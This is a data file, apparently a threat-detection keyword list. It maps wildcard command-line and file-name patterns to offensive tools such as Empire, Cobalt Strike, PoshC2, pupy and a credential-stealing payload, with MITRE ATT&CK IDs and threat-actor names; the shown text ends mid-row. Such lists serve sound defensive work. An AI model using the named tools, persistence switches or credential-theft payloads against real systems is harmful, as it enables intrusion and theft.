Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-BypassUAC.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* PayloadsDirectory*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* payloadtests.py*,offensive_tool_keyword,the-backdoor-factory,Patch PE ELF Mach-O binaries with shellcode new version in development*,T1055.002 - T1055.004 - T1059.001,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/secretsquirrel/the-backdoor-factory,1,0,N/A,10,10,3185,809,2023-08-14T02:52:06Z,2013-05-30T01:04:24Z -* PayloadType.BIND_TCP*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,0,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -* --payload-types all*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types bin*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types ps1*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* --payload-types vbs*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* pcanywhere-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* pcworx-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -PE_Clone *,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,0,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -* -pe-exp-list *.dll*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -* -PEPath * -ExeArgs *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Invoke-PSInject.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -PermanentWMI *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* Persist General *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* Persist Tasksch *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* Persist TreatAs *.dll*,offensive_tool_keyword,COM-Hunter,COM-hunter is a COM Hijacking persistnce tool written in C#,T1122 - T1055.012,TA0003 - TA0005,N/A,N/A,Persistence,https://github.com/nickvourd/COM-Hunter,1,0,N/A,10,3,215,39,2023-09-06T09:48:55Z,2022-05-26T19:34:59Z -* persist_hkcu_run*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* Persistence.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* -PersistenceScriptName *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -PersistentScriptFilePath *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* PEzor.sh *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* -pfx *.pfx -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* pgsql-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -pi \\\\\\\\.\\\\pipe\\\\*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* Pictures\Screenshots\loot.zip*,offensive_tool_keyword,Harvester_OF_SORROW,The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.,T1056.001 - T1113 - T1512 - T1566.001 - T1059.006,TA0004 - TA0009 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -* --pinject *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -PipeName * -ServiceName * -Command whoami*,offensive_tool_keyword,Invoke-SMBRemoting,Interactive Shell and Command Execution over Named-Pipes (SMB),T1059 - T1021.002 - T1572,TA0002 - TA0008 - TA0011,N/A,N/A,Lateral Movement,https://github.com/Leo4j/Invoke-SMBRemoting,1,0,N/A,9,1,22,4,2023-10-02T10:21:34Z,2023-09-06T16:00:47Z -* pipename_stager *,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 